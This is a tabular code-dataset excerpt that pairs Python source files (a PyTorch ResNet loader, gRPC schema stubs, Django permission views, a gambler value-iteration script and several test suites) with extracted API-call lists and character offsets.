code
stringlengths
20
1.05M
apis
sequence
extract_api
stringlengths
75
5.24M
import torch import torch.nn as nn def load_pytorch_model(resnet_name, pretrained): return torch.hub.load('pytorch/vision:v0.6.0', resnet_name, pretrained=pretrained) def freeze_layers(resnet_model): for param in resnet_model.parameters(): param.requires_grad = False return resnet_model def get_resnet(version, class_number, pretrained, freeze_conv=False): """ Выбрать версию сети ResNet :param version: 'resnet18','resnet34', 'resnet50', 'resnet101', 'resnet152', 'wide_resnet50_2', 'wide_resnet101_2', 'resnext50_32x4d', 'resnext101_32x8d', :param class_number: python int :param pretrained: bool :param freeze_conv: bool :return: torch model """ model = load_pytorch_model(version, pretrained) print(f'Loaded: {version}') if freeze_conv: model = freeze_layers(model) num_features = model.fc.in_features model.fc = nn.Linear(num_features, class_number) return model
[ "torch.hub.load", "torch.nn.Linear" ]
[((99, 174), 'torch.hub.load', 'torch.hub.load', (['"""pytorch/vision:v0.6.0"""', 'resnet_name'], {'pretrained': 'pretrained'}), "('pytorch/vision:v0.6.0', resnet_name, pretrained=pretrained)\n", (113, 174), False, 'import torch\n'), ((965, 1002), 'torch.nn.Linear', 'nn.Linear', (['num_features', 'class_number'], {}), '(num_features, class_number)\n', (974, 1002), True, 'import torch.nn as nn\n')]
from riskGame.classes.agent.agent import Agent from riskGame.classes.state.move import Move class Human(Agent): def __init__(self): super(Human, self).__init__(None, None, None) def play_human(self, state, bonus_hold_node_number=None, move_from_node_number=None, move_to_node_number=None, \ moved_armies=None, attacker_node_number=None, attacked_node_number=None, attacked_node_armies=None): move = Move() if bonus_hold_node_number: node = state.get_current_player().get_node_by_name(bonus_hold_node_number) move.set_bonus_hold_node(node) if move_from_node_number and move_to_node_number and moved_armies > 0: from_node = state.get_current_player().get_node_by_name(move_from_node_number) to_node = state.get_current_player().get_node_by_name(move_to_node_number) move.set_move_from_node(from_node) move.set_move_to_node(to_node) move.set_moved_armies(moved_armies) if attacker_node_number and attacked_node_number and attacked_node_armies > 0: attacker_node = state.get_current_player().get_node_by_name(attacker_node_number) if attacker_node: attacked_node = attacker_node.get_possible_attacked_node_by_name(attacked_node_number) else: attacked_node = None move.set_attacker_node(attacker_node) move.set_attacked_node(attacked_node) move.set_attacked_node_armies(attacked_node_armies) return self.play(state, move)
[ "riskGame.classes.state.move.Move" ]
[((447, 453), 'riskGame.classes.state.move.Move', 'Move', ([], {}), '()\n', (451, 453), False, 'from riskGame.classes.state.move import Move\n')]
from threading import Thread from wraptor.context import maybe def test_basic(): with maybe(lambda: False) as result: assert result == False check = False with maybe(lambda: True): check = True assert check def test_threads(): def worker(arr, index): for i in range(5): with maybe(lambda: i == 3): arr[index] = True workers = 100 arr = [False for i in range(workers)] threads = [Thread(target=worker, args=(arr, i)) for i in range(workers)] [t.start() for t in threads] [t.join() for t in threads] assert all(arr)
[ "wraptor.context.maybe", "threading.Thread" ]
[((92, 113), 'wraptor.context.maybe', 'maybe', (['(lambda : False)'], {}), '(lambda : False)\n', (97, 113), False, 'from wraptor.context import maybe\n'), ((183, 203), 'wraptor.context.maybe', 'maybe', (['(lambda : True)'], {}), '(lambda : True)\n', (188, 203), False, 'from wraptor.context import maybe\n'), ((468, 504), 'threading.Thread', 'Thread', ([], {'target': 'worker', 'args': '(arr, i)'}), '(target=worker, args=(arr, i))\n', (474, 504), False, 'from threading import Thread\n'), ((335, 357), 'wraptor.context.maybe', 'maybe', (['(lambda : i == 3)'], {}), '(lambda : i == 3)\n', (340, 357), False, 'from wraptor.context import maybe\n')]
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! """Client and server classes corresponding to protobuf-defined services.""" import grpc from authzed.api.v1alpha1 import schema_pb2 as authzed_dot_api_dot_v1alpha1_dot_schema__pb2 class SchemaServiceStub(object): """SchemaService implements operations on a Permissions System's Schema. """ def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.ReadSchema = channel.unary_unary( '/authzed.api.v1alpha1.SchemaService/ReadSchema', request_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString, response_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString, ) self.WriteSchema = channel.unary_unary( '/authzed.api.v1alpha1.SchemaService/WriteSchema', request_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString, response_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString, ) class SchemaServiceServicer(object): """SchemaService implements operations on a Permissions System's Schema. """ def ReadSchema(self, request, context): """Read returns the current Object Definitions for a Permissions System. Errors include: - INVALID_ARGUMENT: a provided value has failed to semantically validate - NOT_FOUND: one of the Object Definitions being requested does not exist """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def WriteSchema(self, request, context): """Write overwrites the current Object Definitions for a Permissions System. Any Object Definitions that exist, but are not included will be deleted. """ context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_SchemaServiceServicer_to_server(servicer, server): rpc_method_handlers = { 'ReadSchema': grpc.unary_unary_rpc_method_handler( servicer.ReadSchema, request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.FromString, response_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.SerializeToString, ), 'WriteSchema': grpc.unary_unary_rpc_method_handler( servicer.WriteSchema, request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.FromString, response_serializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'authzed.api.v1alpha1.SchemaService', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an EXPERIMENTAL API. class SchemaService(object): """SchemaService implements operations on a Permissions System's Schema. """ @staticmethod def ReadSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/authzed.api.v1alpha1.SchemaService/ReadSchema', authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) @staticmethod def WriteSchema(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/authzed.api.v1alpha1.SchemaService/WriteSchema', authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
[ "grpc.method_handlers_generic_handler", "grpc.experimental.unary_unary", "grpc.unary_unary_rpc_method_handler" ]
[((3077, 3176), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""authzed.api.v1alpha1.SchemaService"""', 'rpc_method_handlers'], {}), "('authzed.api.v1alpha1.SchemaService',\n rpc_method_handlers)\n", (3113, 3176), False, 'import grpc\n'), ((2355, 2629), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.ReadSchema'], {'request_deserializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.FromString', 'response_serializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.SerializeToString'}), '(servicer.ReadSchema,\n request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n ReadSchemaRequest.FromString, response_serializer=\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.\n SerializeToString)\n', (2390, 2629), False, 'import grpc\n'), ((2714, 2991), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.WriteSchema'], {'request_deserializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.FromString', 'response_serializer': 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.SerializeToString'}), '(servicer.WriteSchema,\n request_deserializer=authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n WriteSchemaRequest.FromString, response_serializer=\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.\n SerializeToString)\n', (2749, 2991), False, 'import grpc\n'), ((3728, 4110), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/authzed.api.v1alpha1.SchemaService/ReadSchema"""', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.SerializeToString', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/authzed.api.v1alpha1.SchemaService/ReadSchema',\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.ReadSchemaRequest.\n SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n ReadSchemaResponse.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (3757, 4110), False, 'import grpc\n'), ((4462, 4847), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/authzed.api.v1alpha1.SchemaService/WriteSchema"""', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.SerializeToString', 'authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaResponse.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/authzed.api.v1alpha1.SchemaService/WriteSchema',\n authzed_dot_api_dot_v1alpha1_dot_schema__pb2.WriteSchemaRequest.\n SerializeToString, authzed_dot_api_dot_v1alpha1_dot_schema__pb2.\n WriteSchemaResponse.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (4491, 4847), False, 'import grpc\n')]
import numpy as np theta = 0.00000000000000000000001 #a non zero positive number ph = 0.55 #need to change to fit in new seetings value_table = np.zeros(101) action_table = np.zeros(101) def agent_run(): global theta, ph, value_table value = 0 delta = 0 sweep =0 i=30 while delta>=0: sweep += 1 delta=0 for state in range(1,100): value = value_table[state] for action in range(1,min(state,100-state)+1): if action + state >= 100: temp_value = ph*(1 + value_table[state+action]) + (1 - ph)* (0 + value_table[state-action]) else: temp_value = ph * (0 + value_table[state + action]) + (1 - ph) * (0 + value_table[state - action]) if temp_value > value: value = temp_value #find max for all action optimal_action = action delta = max(delta, abs(value - value_table[state])) if value > value_table[state]: value_table[state] = value action_table[state] = optimal_action #print(delta) #debug if delta < theta: #print(sweep) #debug return value_table output= agent_run() for i in range(0,100): print(action_table[i]) for i in range(0, 100): print(value_table[i]) #print(action_table)
[ "numpy.zeros" ]
[((147, 160), 'numpy.zeros', 'np.zeros', (['(101)'], {}), '(101)\n', (155, 160), True, 'import numpy as np\n'), ((177, 190), 'numpy.zeros', 'np.zeros', (['(101)'], {}), '(101)\n', (185, 190), True, 'import numpy as np\n')]
#encoding=utf8 from django.http import HttpResponse,HttpResponseRedirect from django.shortcuts import render from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage from django.contrib.auth.models import User,Group from django.core import urlresolvers from app.permission.models import PagePermission, UserPerms,GroupPerms from django.core.exceptions import ObjectDoesNotExist from django.contrib.auth.decorators import login_required def _get_named_patterns(): "Returns list of (pattern-name, pattern) tuples" resolver = urlresolvers.get_resolver(None) patterns = [ (key, value[0][0][0], value[1]) for key, value in resolver.reverse_dict.items() if isinstance(key, basestring) ] return patterns @login_required def initialize(request): patterns = _get_named_patterns() r = HttpResponse("initialized", content_type = 'text/plain') for i1,i2,i3 in patterns: #Perm.objects.create(name = i1,code = i3,url_regex = i3,action = i1) try: PagePermission.objects.get(code=i3) except ObjectDoesNotExist: p= PagePermission() p.name = i1 p.code = i3 p.url_regex = i3 p.action = i1 p.save() return r @login_required def user_change(request): if request.method == 'GET': userid = request.GET.get('uid') #get user infomation user = User.objects.get(id=userid) #user permisson list for template perm_qs = PagePermission.objects.all() perms = [ dict(id=perm.id, name=perm.name, selected=False) for perm in perm_qs] #user permisson list for template #group_qs = Group.objects.all() # groups = [ # dict(id=group.id, name=group.name, selected=False) # for group in group_qs # ] #add selected if user has permission user_perms_qs = UserPerms.objects.filter(user=user) user_perms_ids = [user_perm.perm_id for user_perm in user_perms_qs] for i in perms: if i['id'] in user_perms_ids: i['has_perm'] = True #add selected if user in these groups # user_group_qs = user.groups.all() # user_group_ids = [user_group.id for user_group in user_group_qs] # # for j in groups: # if j['id'] in user_group_ids: # j['selected'] = True #render the template return render(request, 'user/change_user.html', {"perms": perms, 'user':user}) elif request.method == 'POST': userid = request.POST.get('uid') perm_ids = request.POST.getlist('permission_list[]') group_ids = request.POST.getlist('group_list[]') user = User.objects.get(id=userid) #删除以前的权限 UserPerms.objects.filter( user_id=userid,).delete() #添加新权限 perm_ids = [long(permid) for permid in perm_ids] for perm_id in perm_ids: up = UserPerms() up.perm_id = perm_id up.user_id = userid up.save() #删除用户组 old_groups = user.groups.all() for og in old_groups: user.groups.remove(og) user.save() #添加新组 groups = Group.objects.filter(id__in=group_ids) for g in groups: user.groups.add(g) user.save() return HttpResponseRedirect('/perm/user/edit?uid=%s' % userid) @login_required def group_change(request): if request.method == 'GET': gid = request.GET.get('gid') #get user infomation group = Group.objects.get(id=gid) #user permisson list for template perm_qs = PagePermission.objects.all() perms = [ dict(id=perm.id, name=perm.name, selected=False) for perm in perm_qs] group_perms_qs = GroupPerms.objects.filter(group=group) group_perms_ids = [group_perm.perm_id for group_perm in group_perms_qs] for i in perms: if i['id'] in group_perms_ids: i['has_perm'] = True #add selected if user in these groups #render the template return render(request, 'user/group_change.html', {"perms": perms, 'group': group}) elif request.method == 'POST': gid = request.POST.get('gid') perm_ids = request.POST.getlist('permission_list[]') group = Group.objects.get(id=gid) #删除以前的权限 GroupPerms.objects.filter( group_id=gid,).delete() #添加新权限 perm_ids = [long(permid) for permid in perm_ids] for perm_id in perm_ids: gp = GroupPerms() gp.perm_id = perm_id gp.group_id = gid gp.save() return HttpResponseRedirect('/perm/group/edit?gid=%s' % gid) @login_required def user_list(request): key = request.GET.get('kw') if key: qs = User.objects.filter(username__contains=key) else: qs = User.objects.all() page = request.GET.get('page') paginator = Paginator(qs, 20) try: show_users = paginator.page(page) except PageNotAnInteger: # If page is not an integer, deliver first page. show_users = paginator.page(1) except EmptyPage: # If page is out of range (e.g. 9999), deliver last page of results. show_users = paginator.page(paginator.num_pages) param = "pz=20&search_kw="+key if key else "pz=20" return render(request, 'user_list.html', {'lines': show_users,"otherparam": param}) # # def initialize(request): # patterns = _get_named_patterns() # r = HttpResponse("initialized", content_type = 'text/plain') # for i1,i2,i3 in patterns: # #Perm.objects.create(name = i1,code = i3,url_regex = i3,action = i1) # try: # Perm.objects.get(code=i3) # # except ObjectDoesNotExist: # p= Perm() # p.name = i1 # p.code = i3 # p.url_regex = i3 # p.action = i1 # p.save() # return r # # # # def _get_named_patterns(): # "Returns list of (pattern-name, pattern) tuples" # resolver = urlresolvers.get_resolver(None) # # for url_ptn in resolver.url_patterns: # print url_ptn # # for key, value in resolver.reverse_dict.items() : # if isinstance(key, basestring): # print key,value # patterns = [ # (key, value[0][0][0],value[1]) # for key, value in resolver.reverse_dict.items() # if isinstance(key, basestring) # ] # return patterns # # # # def edit(request): # # # if request.method == "GET": # perms = Perm.objects.all() # uids = request.GET.get("uids","") # gids = request.GET.get("gids","") # if uids: # member = User.objects.get(id = uids) # _user_perms = UserPerms.objects.filter(user = member) # given_perm_ids = [up.perm_id for up in _user_perms] # elif gids: # member = Group.objects.get(id = gids) # _usergroup_perms = UserGroupPerms.objects.filter(group = member.id) # given_perm_ids = [up.perm_id for up in _usergroup_perms] # # return render_to_response("admin/edit_perms.html",locals()) # else: # uids = request.POST.get("uids") # gids = request.POST.get("gids") # # chosen_perms = map(int,request.POST.getlist("chosen_perms")) # # if uids: # former_perms = UserPerms.objects.filter(user__id = uids) # former_perm_ids = [up.perm_id for up in former_perms] # to_delete_perms = set(former_perm_ids) - set(chosen_perms) # to_add_perms = set(chosen_perms) - set(former_perm_ids) # # UserPerms.change_perm(uids,to_delete_perms,to_add_perms) # # if gids: # former_perms = UserGroupPerms.objects.filter(group__id = gids) # former_perm_ids = [ugp.perm_id for ugp in former_perms] # to_delete_perms = set(former_perm_ids) - set(chosen_perms) # to_add_perms = set(chosen_perms) - set(former_perm_ids) # # UserGroupPerms.change_perm(gids,to_delete_perms,to_add_perms) # # return HttpResponse("EDIT PERMS")
[ "django.shortcuts.render", "django.http.HttpResponseRedirect", "app.permission.models.UserPerms.objects.filter", "app.permission.models.GroupPerms", "django.contrib.auth.models.Group.objects.get", "django.contrib.auth.models.Group.objects.filter", "app.permission.models.UserPerms", "django.http.HttpResponse", "django.contrib.auth.models.User.objects.all", "app.permission.models.PagePermission", "django.core.urlresolvers.get_resolver", "django.contrib.auth.models.User.objects.filter", "app.permission.models.GroupPerms.objects.filter", "app.permission.models.PagePermission.objects.all", "app.permission.models.PagePermission.objects.get", "django.contrib.auth.models.User.objects.get", "django.core.paginator.Paginator" ]
[((551, 582), 'django.core.urlresolvers.get_resolver', 'urlresolvers.get_resolver', (['None'], {}), '(None)\n', (576, 582), False, 'from django.core import urlresolvers\n'), ((850, 904), 'django.http.HttpResponse', 'HttpResponse', (['"""initialized"""'], {'content_type': '"""text/plain"""'}), "('initialized', content_type='text/plain')\n", (862, 904), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((5144, 5161), 'django.core.paginator.Paginator', 'Paginator', (['qs', '(20)'], {}), '(qs, 20)\n', (5153, 5161), False, 'from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\n'), ((5562, 5639), 'django.shortcuts.render', 'render', (['request', '"""user_list.html"""', "{'lines': show_users, 'otherparam': param}"], {}), "(request, 'user_list.html', {'lines': show_users, 'otherparam': param})\n", (5568, 5639), False, 'from django.shortcuts import render\n'), ((1442, 1469), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': 'userid'}), '(id=userid)\n', (1458, 1469), False, 'from django.contrib.auth.models import User, Group\n'), ((1530, 1558), 'app.permission.models.PagePermission.objects.all', 'PagePermission.objects.all', ([], {}), '()\n', (1556, 1558), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((1958, 1993), 'app.permission.models.UserPerms.objects.filter', 'UserPerms.objects.filter', ([], {'user': 'user'}), '(user=user)\n', (1982, 1993), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2504, 2576), 'django.shortcuts.render', 'render', (['request', '"""user/change_user.html"""', "{'perms': perms, 'user': user}"], {}), "(request, 'user/change_user.html', {'perms': perms, 'user': user})\n", (2510, 2576), False, 'from django.shortcuts import render\n'), ((3678, 3703), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'gid'}), '(id=gid)\n', (3695, 3703), False, 'from django.contrib.auth.models import User, Group\n'), ((3764, 3792), 'app.permission.models.PagePermission.objects.all', 'PagePermission.objects.all', ([], {}), '()\n', (3790, 3792), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((3932, 3970), 'app.permission.models.GroupPerms.objects.filter', 'GroupPerms.objects.filter', ([], {'group': 'group'}), '(group=group)\n', (3957, 3970), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4248, 4323), 'django.shortcuts.render', 'render', (['request', '"""user/group_change.html"""', "{'perms': perms, 'group': group}"], {}), "(request, 'user/group_change.html', {'perms': perms, 'group': group})\n", (4254, 4323), False, 'from django.shortcuts import render\n'), ((5007, 5050), 'django.contrib.auth.models.User.objects.filter', 'User.objects.filter', ([], {'username__contains': 'key'}), '(username__contains=key)\n', (5026, 5050), False, 'from django.contrib.auth.models import User, Group\n'), ((5074, 5092), 'django.contrib.auth.models.User.objects.all', 'User.objects.all', ([], {}), '()\n', (5090, 5092), False, 'from django.contrib.auth.models import User, Group\n'), ((1039, 1074), 'app.permission.models.PagePermission.objects.get', 'PagePermission.objects.get', ([], {'code': 'i3'}), '(code=i3)\n', (1065, 1074), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2810, 2837), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'id': 'userid'}), '(id=userid)\n', (2826, 2837), False, 'from django.contrib.auth.models import User, Group\n'), ((3326, 3364), 'django.contrib.auth.models.Group.objects.filter', 'Group.objects.filter', ([], {'id__in': 'group_ids'}), '(id__in=group_ids)\n', (3346, 3364), False, 'from django.contrib.auth.models import User, Group\n'), ((3461, 3516), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (["('/perm/user/edit?uid=%s' % userid)"], {}), "('/perm/user/edit?uid=%s' % userid)\n", (3481, 3516), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((4499, 4524), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'gid'}), '(id=gid)\n', (4516, 4524), False, 'from django.contrib.auth.models import User, Group\n'), ((4852, 4905), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (["('/perm/group/edit?gid=%s' % gid)"], {}), "('/perm/group/edit?gid=%s' % gid)\n", (4872, 4905), False, 'from django.http import HttpResponse, HttpResponseRedirect\n'), ((1126, 1142), 'app.permission.models.PagePermission', 'PagePermission', ([], {}), '()\n', (1140, 1142), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((3051, 3062), 'app.permission.models.UserPerms', 'UserPerms', ([], {}), '()\n', (3060, 3062), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4737, 4749), 'app.permission.models.GroupPerms', 'GroupPerms', ([], {}), '()\n', (4747, 4749), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((2864, 2904), 'app.permission.models.UserPerms.objects.filter', 'UserPerms.objects.filter', ([], {'user_id': 'userid'}), '(user_id=userid)\n', (2888, 2904), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n'), ((4551, 4590), 'app.permission.models.GroupPerms.objects.filter', 'GroupPerms.objects.filter', ([], {'group_id': 'gid'}), '(group_id=gid)\n', (4576, 4590), False, 'from app.permission.models import PagePermission, UserPerms, GroupPerms\n')]
import textwrap import pytest def test_multi_examples(testdir): testdir.makefile( ".feature", steps=textwrap.dedent( """\ Feature: test pytest-bdd step extension pytest-bdd step extension test, step params alias and constant step params e.g. Examples: | v1 | | k11 | | k12 | Examples: | v2 | | k21 | | k22 | Scenario Outline: test multi examples Then show result: <v1> <v2> <v3> <v4> Examples: | v3 | | k31 | | k32 | Examples: | v4 | | k41 | | k42 | Examples: | v2 | | k23 | | k24 | """ ), ) testdir.makepyfile( textwrap.dedent( """\ from pytest_bdd import given, then, scenario @then("show result: <v1> <v2> <v3> <v4>") def step_then_show_result(v1, v2, v3, v4): print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4)) @scenario('steps.feature', 'test multi examples') def test_multi_examples(): pass """ ) ) result = testdir.runpytest("-v", "-s") result.assert_outcomes(passed=16, failed=0)
[ "textwrap.dedent" ]
[((970, 1385), 'textwrap.dedent', 'textwrap.dedent', (['""" from pytest_bdd import given, then, scenario\n\n\n @then("show result: <v1> <v2> <v3> <v4>")\n def step_then_show_result(v1, v2, v3, v4):\n print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))\n\n\n @scenario(\'steps.feature\', \'test multi examples\')\n def test_multi_examples():\n pass\n """'], {}), '(\n """ from pytest_bdd import given, then, scenario\n\n\n @then("show result: <v1> <v2> <v3> <v4>")\n def step_then_show_result(v1, v2, v3, v4):\n print ("show result: {0}_{1}_{2}_{3}".format(v1, v2, v3, v4))\n\n\n @scenario(\'steps.feature\', \'test multi examples\')\n def test_multi_examples():\n pass\n """\n )\n', (985, 1385), False, 'import textwrap\n'), ((122, 916), 'textwrap.dedent', 'textwrap.dedent', (['""" Feature: test pytest-bdd step extension\n pytest-bdd step extension test, step params alias and constant step params e.g.\n\n Examples:\n | v1 |\n | k11 |\n | k12 |\n\n Examples:\n | v2 |\n | k21 |\n | k22 |\n\n\n Scenario Outline: test multi examples\n Then show result: <v1> <v2> <v3> <v4>\n Examples:\n | v3 |\n | k31 |\n | k32 |\n Examples:\n | v4 |\n | k41 |\n | k42 |\n Examples:\n | v2 |\n | k23 |\n | k24 | \n """'], {}), '(\n """ Feature: test pytest-bdd step extension\n pytest-bdd step extension test, step params alias and constant step params e.g.\n\n Examples:\n | v1 |\n | k11 |\n | k12 |\n\n Examples:\n | v2 |\n | k21 |\n | k22 |\n\n\n Scenario Outline: test multi examples\n Then show result: <v1> <v2> <v3> <v4>\n Examples:\n | v3 |\n | k31 |\n | k32 |\n Examples:\n | v4 |\n | k41 |\n | k42 |\n Examples:\n | v2 |\n | k23 |\n | k24 | \n """\n )\n', (137, 916), False, 'import textwrap\n')]
from spotlight.tests.validator_test import ValidatorTest from spotlight import errors as err class CustomMessageTest(ValidatorTest): def setUp(self): self.validator.messages = {} self.validator.fields = {} self.validator.values = {} def test_custom_field_message_expect_new_message(self): new_message = "You've supplied an invalid e-mail address." rules = { "email": "email" } input_values = { "email": "this.is.not.a.valid.email" } messages = { "email": new_message } self.validator.messages = messages errors = self.validator.validate(input_values, rules) errs = errors.get("email") self.assertEqual(errs[0], new_message) def test_custom_subfield_message_expect_new_message(self): new_message = "Hey! This is a required field!" rules = { "email": "required" } input_values = {} messages = { "email.required": new_message } self.validator.messages = messages errors = self.validator.validate(input_values, rules) errs = errors.get("email") self.assertEqual(errs[0], new_message) def test_custom_subfield_message_with_field_expect_new_message(self): new_message = "Hey! The {field} field is a required field!" rules = { "email": "required" } input_values = {} messages = { "email.required": new_message } self.validator.messages = messages errors = self.validator.validate(input_values, rules) errs = errors.get("email") self.assertEqual(errs[0], new_message.format(field="email")) def test_custom_subfield_message_with_min_expect_new_message(self): new_message = "Hey! The {field} field has to be at least {min} chars!" rules = { "email": "min:5" } input_values = { "email": "oops" } messages = { "email.min": new_message } self.validator.messages = messages errors = self.validator.validate(input_values, rules) errs = errors.get("email") self.assertEqual(errs[0], new_message.format(field="email", min=5)) def test_custom_field_expect_new_field(self): rules = { "test": "min:5" } input_values = { "test": "oops" } fields = { "test": "custom" } self.validator.fields = fields expected = err.MIN_STRING_ERROR.format(field="custom", min=5) errors = self.validator.validate(input_values, rules) errs = errors.get("test") self.assertEqual(errs[0], expected) def test_custom_field_and_custom_other_field_expect_new_fields(self): new_message = "The {field} field has to be present with {other}." rules = { "test1": "required", "test2": "required_with:test1" } input_values = { "test1": "hello" } messages = { "test2.required_with": new_message } fields = { "test1": "custom", "test2": "lol" } self.validator.messages = messages self.validator.fields = fields expected = new_message.format(field="lol", other="custom") errors = self.validator.validate(input_values, rules) errs = errors.get("test2") self.assertEqual(errs[0], expected) def test_custom_field_message_with_custom_field_expect_new_message(self): new_message = "You've supplied an invalid {field}." rules = { "email2": "email" } input_values = { "email2": "this.is.not.a.valid.email" } messages = { "email2": new_message } fields = { "email2": "e-mail address" } self.validator.messages = messages self.validator.fields = fields errors = self.validator.validate(input_values, rules) errs = errors.get("email2") self.assertEqual(errs[0], new_message.format(field="e-mail address")) def test_custom_values_with_in_rule_expect_new_values(self): field = "test" new_values = "piet, henk, jan" rules = { "test": "in:val1,val2,val3" } input_values = { "test": "this.is.not.a.valid.email" } values = { "test": { "values": new_values } } self.validator.values = values expected = err.IN_ERROR.format(field=field, values=new_values) errors = self.validator.validate(input_values, rules) errs = errors.get(field) self.assertEqual(errs[0], expected) def test_custom_fields_with_required_if_rule_expect_new_fields(self): new_message = "The {field} field is required when {other} is {value}." field = "credit card number" other = "payment type" value = "credit card" rules = { "payment_type": "in:crypto,cc,ideal", "credit_card_number": "required_if:payment_type,cc" } input_values = { "payment_type": "cc" } messages = { "credit_card_number.required_if": new_message } fields = { "payment_type": other, "credit_card_number": field, "cc": value } self.validator.messages = messages self.validator.fields = fields expected = new_message.format( field=field, other=other, value=value ) errors = self.validator.validate(input_values, rules) errs = errors.get("credit_card_number") self.assertEqual(errs[0], expected)
[ "spotlight.errors.IN_ERROR.format", "spotlight.errors.MIN_STRING_ERROR.format" ]
[((2608, 2658), 'spotlight.errors.MIN_STRING_ERROR.format', 'err.MIN_STRING_ERROR.format', ([], {'field': '"""custom"""', 'min': '(5)'}), "(field='custom', min=5)\n", (2635, 2658), True, 'from spotlight import errors as err\n'), ((4689, 4740), 'spotlight.errors.IN_ERROR.format', 'err.IN_ERROR.format', ([], {'field': 'field', 'values': 'new_values'}), '(field=field, values=new_values)\n', (4708, 4740), True, 'from spotlight import errors as err\n')]
